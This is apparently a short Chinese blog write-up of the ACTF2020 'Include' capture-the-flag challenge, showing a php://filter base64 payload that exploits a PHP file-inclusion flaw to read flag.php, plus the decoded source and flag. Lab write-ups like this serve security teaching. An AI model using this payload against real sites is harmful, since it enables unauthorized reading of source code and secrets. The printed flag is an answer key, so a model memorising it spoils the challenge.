[ACTF2020 新生赛]Include1

打开靶机,看到有个flag.php,flag应该是在这里

访问之后并没有什么有用的信息

 

 利用include漏洞读取flag.php看看  ?file=php://filter/read=convert.base64-encode/resource=flag.php

 使用base64解码后得到 flag,提交完成解题

<?php
echo "Can you find out the flag?";
//flag{d8573a2b-b409-44af-99a2-c16e8ed66ccc}

相关推荐

  1. [SWPUCTF 2021 新生]PseudoProtocols

    2024-07-17 11:04:02       46 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-17 11:04:02       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-17 11:04:02       72 阅读
  3. 在Django里面运行非项目文件

    2024-07-17 11:04:02       58 阅读
  4. Python语言-面向对象

    2024-07-17 11:04:02       69 阅读

热门阅读

  1. C#拆分单页PDF

    2024-07-17 11:04:02       25 阅读
  2. TCP/IP、UDP、HTTP 协议介绍比较和总结

    2024-07-17 11:04:02       22 阅读
  3. js | 原型链

    2024-07-17 11:04:02       24 阅读
  4. baomidou @DS注解

    2024-07-17 11:04:02       23 阅读
  5. arkts中状态管理

    2024-07-17 11:04:02       26 阅读
  6. mac如何查看cpu和显卡温度

    2024-07-17 11:04:02       27 阅读
  7. 关于HBase、Phoenix、Flume、Maxwell 和 Flink

    2024-07-17 11:04:02       25 阅读
  8. 银河麒麟如何部署QtMqtt(入门案例教程)

    2024-07-17 11:04:02       25 阅读
  9. Android中ContentProvider学习记录

    2024-07-17 11:04:02       23 阅读
  10. IPython 宏魔法:%macro 命令的高效使用指南

    2024-07-17 11:04:02       25 阅读
  11. 五、python列表

    2024-07-17 11:04:02       27 阅读